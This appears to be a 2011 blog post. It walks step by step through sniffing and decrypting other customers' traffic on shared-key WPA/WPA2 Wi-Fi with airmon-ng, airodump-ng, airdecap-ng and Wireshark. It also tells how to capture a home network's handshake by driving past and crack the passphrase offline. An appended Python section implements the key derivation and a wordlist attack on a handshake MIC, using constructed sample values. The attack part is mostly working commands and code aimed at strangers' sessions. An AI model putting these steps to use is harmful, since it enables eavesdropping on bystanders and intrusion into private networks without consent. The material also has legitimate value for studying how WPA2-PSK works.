Wednesday 12 January 2011

WPA2 Packet Capture

Reading other users' packets on a "secure" wireless access point is stupidly easy, as long as the network uses a shared key and you know it.

If you sit anywhere that has a free access point (a coffee shop, a juice bar, whatever) you can capture traffic from other users. You may think this can only be done on open access points. You'd be wrong. This is no secret: you can capture and decrypt other users' packets even with encryption turned on, whether that is WEP, WPA or even the strongest WPA2. On a pre-shared-key network every user's per-session key is derived from the same passphrase plus values that are exchanged in the clear when a client joins, so anyone holding the passphrase can rebuild everyone else's keys. (WPA2-Enterprise, where 802.1X/EAP gives each client its own master key, is the exception.) Seriously, this isn't new.

In the case of the coffee shop the operators will give you the wireless key for free. In other places they may charge a small fee for use of the access point. It doesn't really matter whether they give you the key or not, tbh, because it is pretty simple to snaffle it: drive past a house, sniff for as little as a few seconds to catch a client's four-way handshake, then run a dictionary or brute-force attack against that handshake offline (aircrack-ng does exactly this). Anyhoo, this is off topic.

How to do it.

Install BackTrack 4. This takes about 30 minutes. It's easier to run BT4 as the host OS so that all the tools are to hand and you get raw access to the wireless interface (monitor mode needs a driver that supports it, which is awkward from inside a VM). After this step it is as simple as a few commands.

Show the adapter config

iwconfig


Create a new interface in monitor mode (airmon-ng prints the name of the monitor interface it creates; on BT4 it is mon0)

airmon-ng start wlan0


Now scan for available networks and note the BSSID, channel and ESSID of the one you are interested in

airodump-ng mon0


Capture traffic on the access point in question. The -w prefix makes airodump-ng write demo_capture-01.cap. You need a client's four-way handshake in the capture before anything of theirs can be decrypted, so keep capturing until a client connects or reconnects; airodump-ng shows "WPA handshake: <BSSID>" in its status line once it has one.

airodump-ng -c CHANNEL --bssid MAC_ADDRESS -w demo_capture mon0


Decrypt the captured packets. Each client's key is derived from the passphrase and the nonces in its handshake, so only clients whose handshake was captured get decrypted; airdecap-ng writes the result to demo_capture-01-dec.cap (use -w instead of -e/-p for WEP).

airdecap-ng -e SSID_NAME -p PASSWORD_KEY demo_capture-01.cap


Open the decrypted capture (demo_capture-01-dec.cap) in Wireshark and follow any TCP streams that look interesting. You'll be surprised what you can find out: anything sent over plain HTTP, POP3, IMAP or FTP is now readable, while TLS-protected sessions stay encrypted.
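As an added worked example (not part of the original post, and not aircrack-ng's own code), here is what airdecap-ng does with the -e/-p values above, and what the offline brute force mentioned earlier boils down to: the PMK is PBKDF2(passphrase, SSID); the per-client PTK comes from the PMK plus the two MAC addresses and two nonces the four-way handshake sends in the clear; and the MIC on handshake message 2 lets any candidate passphrase be checked without talking to the AP. The MAC addresses, nonces, wordlist and EAPOL frame are constructed sample data; the SSID "IEEE" / passphrase "password" pair is the published 802.11i PBKDF2 test vector.

```python
import hashlib
import hmac
import struct

# Added example, not part of the original post and not aircrack-ng's code.
# It shows the key derivation airdecap-ng performs from -e SSID / -p PASSPHRASE,
# and the MIC check an offline dictionary attack (aircrack-ng) runs per candidate.
# All MAC addresses, nonces, the wordlist and the EAPOL frame are constructed.

PRF_LABEL = b"Pairwise key expansion"
MIC_OFFSET = 81   # Key MIC field offset inside the EAPOL-Key frame (4-byte 802.1X header + 77)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512 -> 64-byte PTK = KCK(16) || KEK(16) || TK(16) || TKIP MIC keys(16).

    Only the PMK is secret: both MACs and both nonces are sent in the clear during
    the four-way handshake, so anyone holding the PSK can rebuild every client's PTK.
    """
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):                       # 4 x 20 bytes covers the 64 bytes needed
        out += hmac.new(pmk, PRF_LABEL + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, kck: bytes) -> bytes:
    """Construct a minimal EAPOL-Key message 2 (client -> AP): SNonce plus a MIC under the real KCK."""
    key_info = 0x010A                        # descriptor version 2, pairwise, MIC bit set
    body = struct.pack(">BHHQ", 2, key_info, 16, 1)            # RSN descriptor, key info, key len, replay ctr
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, key IV, RSC, key ID
    body += b"\x00" * 16 + struct.pack(">H", 0)                # MIC placeholder, key data length 0
    eapol = struct.pack(">BBH", 2, 3, len(body)) + body        # 802.1X v2, packet type 3 = EAPOL-Key
    return eapol[:MIC_OFFSET] + eapol_mic(kck, eapol) + eapol[MIC_OFFSET + 16:]


def check_passphrase(candidate: str, ssid: str, aa: bytes, spa: bytes,
                     anonce: bytes, snonce: bytes, msg2: bytes) -> bool:
    """True if the candidate passphrase reproduces the MIC on the captured message 2."""
    kck = derive_ptk(derive_pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, msg2), msg2[MIC_OFFSET:MIC_OFFSET + 16])


def crack(wordlist, ssid, aa, spa, anonce, snonce, msg2):
    """Offline dictionary attack: return the first candidate whose MIC matches, else None."""
    for candidate in wordlist:
        if check_passphrase(candidate, ssid, aa, spa, anonce, snonce, msg2):
            return candidate
    return None


# Constructed sample handshake. "IEEE"/"password" is the published 802.11i PBKDF2 test vector.
SSID = "IEEE"
PASSPHRASE = "password"
AA = bytes.fromhex("001122334455")       # constructed AP BSSID
SPA = bytes.fromhex("66778899aabb")      # constructed client MAC
ANONCE = bytes(range(32))                # constructed AP nonce (message 1)
SNONCE = bytes(range(32, 64))            # constructed client nonce (message 2)


def demo() -> dict:
    pmk = derive_pmk(PASSPHRASE, SSID)
    ptk = derive_ptk(pmk, AA, SPA, ANONCE, SNONCE)
    msg2 = build_msg2(SNONCE, ptk[:16])  # what the client would send over the air
    found = crack(["letmein", "coffee123", "password", "hunter2"], SSID, AA, SPA, ANONCE, SNONCE, msg2)
    return {"pmk": pmk.hex(), "tk": ptk[32:48].hex(), "recovered": found}


if __name__ == "__main__":
    result = demo()
    print("PMK:", result["pmk"])
    print("CCMP TK (what decrypts this client's data frames):", result["tk"])
    print("Passphrase recovered from wordlist:", result["recovered"])
```

The expensive part is the 4096-round PBKDF2 per candidate, which is why an attacker captures once and grinds offline; nothing after that needs the AP. The TK slice of the PTK is the AES-CCMP key airdecap-ng uses on that client's data frames, which is also why a client whose handshake you missed stays opaque: without its nonces there is no PTK to derive. For WPA/TKIP the MIC is HMAC-MD5 instead of HMAC-SHA1, and the rest is the same.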